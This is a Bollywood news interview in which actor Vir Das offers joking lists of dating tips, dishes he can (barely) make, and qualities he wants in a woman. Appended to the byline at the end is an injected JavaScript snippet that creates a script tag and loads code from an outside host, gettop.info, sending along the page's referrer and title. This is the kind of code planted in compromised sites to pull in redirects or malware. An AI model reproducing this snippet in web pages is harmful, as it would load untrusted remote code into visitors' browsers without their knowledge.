In his next film Amit Sahni Ki List, Vir Das plays a guy who makes a list of qualities he wants in his ideal girl. So we thought it would be fun to ask him to make his personal lists (more than one) about woman and dating for us.
Five things you would advise a guy to do to impress a girl.
2. Write a song. Even if it’s cheesy, the girls love it.
3. Don’t try and dress well. Just be comfortable in what you wear … girls find that good.
4. Women love it if you can make her friends laugh. But don’t hit on the friends though!
5. Most importantly, accept that you know nothing!
Five things that a guy should not do while wooing a girl.
1. Never talk about money
2. You should not boast or gloat about your deeds.
3. You should not be a brand person. They like good stuff but not always a Louis Vuitton or Gucci.
4. You cannot be jealous. Ever! You got to be very secure as a person about your girl.
5. Never order for a woman. Let them make decisions!
You should be well informed as a person
List the five dishes that you would cook to impress your girl.
1. Well, I can make toast.
2. I can make tea.
3. I can’t cook to save my life. So that’s one thing I could not impress any girl with … but I could order pizza from Dominos.
4. I could take her out for some nice ice creams from Baskin Robbins.
5. I could take her to a nice Sushi place.
Five things that you look for in a girl
1. I look for a sense of self (assurance) in a woman. She should be confident.
2. She should be funny and be able to make me laugh
3. Having nice eyes and nice hips is great.
4. She should not be overly superficial. That’s a put off.
5. She should be nurturing.
-By Noyon Jyoti Parasara, Bollywood News Servicevar d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;